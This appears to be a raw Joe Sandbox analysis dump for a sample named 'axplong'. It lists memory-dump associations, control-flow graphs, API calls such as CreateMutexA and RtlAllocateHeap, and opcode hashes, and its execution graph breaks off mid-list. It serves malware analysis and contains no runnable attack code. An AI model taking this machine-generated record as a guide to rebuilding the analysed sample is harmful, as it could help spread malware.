                                                                                                                                                                                                        • Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: 393d2ace9f72fd6a4cee5fae7b8761c0bc608d41c8e8adc665356275522e00d7
                                                                                                                                                                                                        • Instruction ID: d5b22cf45c05c51f2070c77ac5630d8b7f19b8e3cf44bbfc430f6c8b2441a148
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 393d2ace9f72fd6a4cee5fae7b8761c0bc608d41c8e8adc665356275522e00d7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0217931754200DBFB089BACDD8476DBBA3DF81314F24022DE545DB7D5CB369A829392

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 306 63a786-63a79e 307 63a7a0-63a7ac 306->307 308 63a7cc-63a7ce 306->308 309 63a7c2-63a7c9 call 64d593 307->309 310 63a7ae-63a7bc 307->310 311 63a7d0-63a7d7 308->311 312 63a7d9-63a7e1 call 637d00 308->312 309->308 310->309 313 63a87e 310->313 315 63a81b-63a846 call 647f30 311->315 323 63a7e3-63a7eb call 637d00 312->323 324 63a814-63a816 312->324 319 63a883-63a8b7 Sleep CreateMutexA 313->319 320 63a87e call 666b9a 313->320 325 63a8be-63a8c4 319->325 320->319 323->324 331 63a7ed-63a7f5 call 637d00 323->331 324->315 327 63a8d7-63a8d8 325->327 328 63a8c6-63a8c8 325->328 328->327 330 63a8ca-63a8d5 328->330 330->327 331->324 335 63a7f7-63a7ff call 637d00 331->335 335->324 338 63a801-63a809 call 637d00 335->338 338->324 341 63a80b-63a812 338->341 341->315
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: 0cb2ec1aac4aa9f8da3c074395bc5ff9557685e3e67938569a2ed39da7c1dc23
                                                                                                                                                                                                        • Instruction ID: 71b14b74451a82f59d65f794675a315ad2b61e2496f3fe0735177780018da1d8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0cb2ec1aac4aa9f8da3c074395bc5ff9557685e3e67938569a2ed39da7c1dc23
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E219E703482009AFB286BFCD8C677D76639F91704F20492AE141DB7D2CB759882A2E3

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 342 66d6ef-66d6fa 343 66d6fc-66d706 342->343 344 66d708-66d70e 342->344 343->344 345 66d73c-66d747 call 667443 343->345 346 66d727-66d738 RtlAllocateHeap 344->346 347 66d710-66d711 344->347 353 66d749-66d74b 345->353 349 66d713-66d71a call 669c81 346->349 350 66d73a 346->350 347->346 349->345 355 66d71c-66d725 call 668cf9 349->355 350->353 355->345 355->346
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0066A6D3,00000001,00000364,00000006,000000FF,?,0066ECFF,?,00000004,00000000,?,?), ref: 0066D731
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                        • Opcode ID: 2dce1fe8a953f35e0727bbc026a26194a6392ffd1a9068c759d8b9ba44c46c81
                                                                                                                                                                                                        • Instruction ID: 6c123458abef4bea9241b322d261e671ddd2787545c5218c5240bb51151bb5d2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2dce1fe8a953f35e0727bbc026a26194a6392ffd1a9068c759d8b9ba44c46c81
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14F0E231F0523566DB212F269D05B9B3F8B9F917B1F198112AC04AA281CE31DC0043F3

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:0.9%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:1866
                                                                                                                                                                                                        Total number of Limit Nodes:15
                                                                                                                                                                                                        execution_graph 10144 631e60 10145 647f30 RtlAllocateHeap 10144->10145 10146 631e71 10145->10146 10149 64d57e 10146->10149 10152 64d551 10149->10152 10153 64d567 10152->10153 10154 64d560 10152->10154 10161 6697bb 10153->10161 10158 66974f 10154->10158 10157 631e7b 10159 6697bb RtlAllocateHeap 10158->10159 10160 669761 10159->10160 10160->10157 10164 6694f1 10161->10164 10163 6697ec 10163->10157 10165 6694fd 10164->10165 10168 66954c 10165->10168 10167 669518 10167->10163 10169 669568 10168->10169 10176 6695df 10168->10176 10170 6695bf 10169->10170 10169->10176 10178 66ecb6 10169->10178 10172 66ecb6 RtlAllocateHeap 10170->10172 10170->10176 10174 6695d5 10172->10174 10173 6695b5 10175 66acb5 RtlAllocateHeap 10173->10175 10177 66acb5 RtlAllocateHeap 10174->10177 10175->10170 10176->10167 10177->10176 10179 66ecc3 10178->10179 10180 66ecde 10178->10180 10179->10180 10181 66eccf 10179->10181 10182 66eced 10180->10182 10187 674e9c 10180->10187 10183 667443 RtlAllocateHeap 10181->10183 10194 674ecf 10182->10194 10186 66ecd4 10183->10186 10186->10173 10188 674ea7 10187->10188 10189 674ebc 10187->10189 10190 667443 RtlAllocateHeap 10188->10190 10189->10182 10191 674eac 10190->10191 10192 666b8a RtlAllocateHeap 10191->10192 10193 674eb7 10192->10193 10193->10182 10195 674ee7 10194->10195 10196 674edc 10194->10196 10198 674eef 10195->10198 10202 674ef8 10195->10202 10203 66af0b 10196->10203 10199 66acb5 RtlAllocateHeap 10198->10199 10201 674ee4 10199->10201 10200 667443 RtlAllocateHeap 10200->10201 10201->10186 10202->10200 10202->10201 10204 66af19 10203->10204 10205 667443 RtlAllocateHeap 10204->10205 10206 66af47 10204->10206 10205->10206 10206->10201 10217 632060 10222 64c5bb 10217->10222 10220 64d57e RtlAllocateHeap 10221 632076 10220->10221 10225 64c305 10222->10225 10224 63206c 10224->10220 10226 64c311 10225->10226 10227 64c31b 10225->10227 10228 64c2ee 10226->10228 10229 64c2ce 10226->10229 10227->10224 10238 64cc3a 10228->10238 10229->10227 10234 64cc05 10229->10234 10232 64c300 10232->10224 10235 64cc13 InitializeCriticalSectionEx 10234->10235 10237 64c2e7 10234->10237 10235->10237 10237->10224 10239 64cc4f RtlInitializeConditionVariable 10238->10239 10239->10232 10250 633460 10251 63346a 10250->10251 10252 63348a 10250->10252 10251->10252 10253 666b9a RtlAllocateHeap 10251->10253 10254 6334b2 10253->10254 10270 634270 10273 633a80 10270->10273 10272 63427b 10274 633ab9 10273->10274 10275 633af9 10274->10275 10276 666b9a RtlAllocateHeap 10274->10276 10275->10272 10277 633ba6 10276->10277 10280 633bf8 10277->10280 10285 633290 10277->10285 10278 633290 6 API calls 10282 633c1f 10278->10282 10280->10278 10280->10282 10281 633c28 10281->10272 10282->10281 10304 6337d0 10282->10304 10308 64c5dc 10285->10308 10287 63332b 10314 64c19a 10287->10314 10289 6332fc 10291 64c19a 5 API calls 10289->10291 10295 633310 10289->10295 10292 633337 10291->10292 10294 64c5dc GetSystemTimePreciseAsFileTime 10292->10294 10293 6332d4 10293->10287 10293->10289 10311 64bc7c 10293->10311 10296 63336f 10294->10296 10295->10280 10297 64c19a 5 API calls 10296->10297 10298 633376 10296->10298 10297->10298 10299 64c19a 5 API calls 10298->10299 10300 633397 10298->10300 10299->10300 10301 64c19a 5 API calls 10300->10301 10302 6333ab 10300->10302 10303 6333ce 10301->10303 10302->10280 10303->10280 10305 6337dc 10304->10305 10489 632400 10305->10489 10318 64c382 10308->10318 10310 64c5e9 10310->10293 10335 64baa2 10311->10335 10313 64bc8c 10313->10293 10315 64c1c2 10314->10315 10316 64c1a4 10314->10316 10315->10315 10316->10315 10341 64c1c7 10316->10341 10319 64c3d8 10318->10319 10321 64c3aa 10318->10321 10319->10321 10324 64ce9b 10319->10324 10321->10310 10322 64c42d 10322->10321 10323 64ce9b GetSystemTimePreciseAsFileTime 10322->10323 10323->10322 10325 64ceaa 10324->10325 10327 64ceb7 10324->10327 10325->10327 10328 64ce74 10325->10328 10327->10322 10331 64cb1a 10328->10331 10332 64cb37 10331->10332 10333 64cb2b GetSystemTimePreciseAsFileTime 10331->10333 10332->10327 10333->10332 10336 64bacc 10335->10336 10337 64ce9b GetSystemTimePreciseAsFileTime 10336->10337 10340 64bad4 10336->10340 10338 64baff 10337->10338 10339 64ce9b GetSystemTimePreciseAsFileTime 10338->10339 10338->10340 10339->10340 10340->10313 10346 632aa0 10341->10346 10345 64c1ef 10374 64be0f 10346->10374 10348 632abf 10366 64c12f 10348->10366 10349 632ab4 10349->10348 10377 66a531 10349->10377 10367 64c13b 10366->10367 10368 647f30 RtlAllocateHeap 10367->10368 10369 64c16d 10368->10369 10428 632670 10369->10428 10371 64c182 10445 6477e0 10371->10445 10373 64c18a 10373->10345 10397 64cb61 10374->10397 10378 66a53b 10377->10378 10379 66d6ef RtlAllocateHeap 10378->10379 10380 66a554 10378->10380 10382 66a57c 10379->10382 10381 666bfc 10380->10381 10383 668aaf 4 API calls 10380->10383 10391 668aaf 10381->10391 10384 66a5bc 10382->10384 10385 66a584 10382->10385 10388 66a5ed 10383->10388 10386 66a35f RtlAllocateHeap 10384->10386 10387 66acb5 RtlAllocateHeap 10385->10387 10389 66a5c7 10386->10389 10387->10380 10390 66acb5 RtlAllocateHeap 10389->10390 10390->10380 10392 668ab4 10391->10392 10396 668abf 10392->10396 10401 66d4f4 10392->10401 10422 66651d 10396->10422 10398 64cb6f InitOnceExecuteOnce 10397->10398 10400 64be22 